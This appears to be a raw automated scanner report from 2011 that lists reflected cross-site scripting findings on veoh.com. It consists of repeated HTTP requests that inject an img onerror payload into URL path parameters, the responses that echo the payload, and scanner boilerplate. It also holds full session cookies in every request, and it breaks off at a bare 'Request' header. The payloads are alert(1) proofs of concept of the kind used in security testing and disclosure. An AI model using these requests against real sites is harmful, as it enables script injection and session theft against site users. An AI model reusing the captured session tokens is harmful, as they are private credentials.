GET /browse/videos/category/educational_and_howtoaa06e"><img%20src%3da%20onerror%3dalert(1)>7b8d668185d/watch/v20767155HXCcYkcJ HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:59 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=96 Content-Length: 78368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/educational_and_howtoaa06e"><img src=a onerror=alert(1)>7b8d668185d/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1c2d'%3b713d1af7ffd was submitted in the REST URL parameter 6. This input was echoed as b1c2d';713d1af7ffd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJb1c2d'%3b713d1af7ffd HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:55 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=80 Content-Length: 99708
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4e10"><img%20src%3da%20onerror%3dalert(1)>e01df9f8906 was submitted in the REST URL parameter 4. This input was echoed as b4e10"><img src=a onerror=alert(1)>e01df9f8906 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/entertainmentb4e10"><img%20src%3da%20onerror%3dalert(1)>e01df9f8906/watch/v20767324YkGXZzfQ HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:35 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=75 Content-Length: 76209
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/entertainmentb4e10"><img src=a onerror=alert(1)>e01df9f8906/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b3fcf<img%20src%3da%20onerror%3dalert(1)>5a765c7587a was submitted in the REST URL parameter 4. This input was echoed as b3fcf<img src=a onerror=alert(1)>5a765c7587a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/entertainmentb3fcf<img%20src%3da%20onerror%3dalert(1)>5a765c7587a/watch/v20767324YkGXZzfQ HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:50 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=100 Content-Length: 76165
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_entertainmentb3fcf<img src=a onerror=alert(1)>5a765c7587a"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48a9e'%3b18c90b1747d was submitted in the REST URL parameter 6. This input was echoed as 48a9e';18c90b1747d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/entertainment/watch/v20767324YkGXZzfQ48a9e'%3b18c90b1747d HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:39:01 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=50 Content-Length: 95042
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9b8b"><img%20src%3da%20onerror%3dalert(1)>fa9b9160bac was submitted in the REST URL parameter 4. This input was echoed as b9b8b"><img src=a onerror=alert(1)>fa9b9160bac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/people_and_blogsb9b8b"><img%20src%3da%20onerror%3dalert(1)>fa9b9160bac/watch/v20767178Fn5bZQJP HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:28 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=60 Content-Length: 77558
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/people_and_blogsb9b8b"><img src=a onerror=alert(1)>fa9b9160bac/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 36ade<img%20src%3da%20onerror%3dalert(1)>19ea89e01e1 was submitted in the REST URL parameter 4. This input was echoed as 36ade<img src=a onerror=alert(1)>19ea89e01e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/people_and_blogs36ade<img%20src%3da%20onerror%3dalert(1)>19ea89e01e1/watch/v20767178Fn5bZQJP HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:50 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=90 Content-Length: 77514
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_people_and_blogs36ade<img src=a onerror=alert(1)>19ea89e01e1"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 614f9'%3be5e8b5ac5dc was submitted in the REST URL parameter 6. This input was echoed as 614f9';e5e8b5ac5dc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP614f9'%3be5e8b5ac5dc HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:39:01 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=58 Content-Length: 106431
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba32a"><img%20src%3da%20onerror%3dalert(1)>a3be2b20567 was submitted in the REST URL parameter 4. This input was echoed as ba32a"><img src=a onerror=alert(1)>a3be2b20567 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/list/tab/groupsba32a"><img%20src%3da%20onerror%3dalert(1)>a3be2b20567 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Length: 4472 Date: Thu, 03 Feb 2011 21:47:01 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=51
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 254d4"><img%20src%3da%20onerror%3dalert(1)>329c969f72e was submitted in the REST URL parameter 4. This input was echoed as 254d4"><img src=a onerror=alert(1)>329c969f72e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/list/tab/home254d4"><img%20src%3da%20onerror%3dalert(1)>329c969f72e HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Length: 4420 Date: Thu, 03 Feb 2011 21:46:39 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=91
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3604"><img%20src%3da%20onerror%3dalert(1)>53d97fb589d was submitted in the REST URL parameter 4. This input was echoed as d3604"><img src=a onerror=alert(1)>53d97fb589d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/list/tab/moviesd3604"><img%20src%3da%20onerror%3dalert(1)>53d97fb589d HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Length: 4472 Date: Thu, 03 Feb 2011 21:46:45 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=34
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32244"><img%20src%3da%20onerror%3dalert(1)>f5bcaf4b0ea was submitted in the REST URL parameter 4. This input was echoed as 32244"><img src=a onerror=alert(1)>f5bcaf4b0ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/list/tab/music32244"><img%20src%3da%20onerror%3dalert(1)>f5bcaf4b0ea HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Length: 4446 Date: Thu, 03 Feb 2011 21:46:52 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=99
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21de1"><img%20src%3da%20onerror%3dalert(1)>a2d080657a4 was submitted in the REST URL parameter 4. This input was echoed as 21de1"><img src=a onerror=alert(1)>a2d080657a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/list/tab/tvshows21de1"><img%20src%3da%20onerror%3dalert(1)>a2d080657a4 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Length: 4498 Date: Thu, 03 Feb 2011 21:46:41 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=49
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97565"><img%20src%3da%20onerror%3dalert(1)>386056b84fa was submitted in the REST URL parameter 4. This input was echoed as 97565"><img src=a onerror=alert(1)>386056b84fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/list/tab/videos97565"><img%20src%3da%20onerror%3dalert(1)>386056b84fa HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Content-Length: 4472 Date: Thu, 03 Feb 2011 21:46:41 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=90
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac136"><img%20src%3da%20onerror%3dalert(1)>223b61dcbe7 was submitted in the REST URL parameter 4. This input was echoed as ac136"><img src=a onerror=alert(1)>223b61dcbe7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
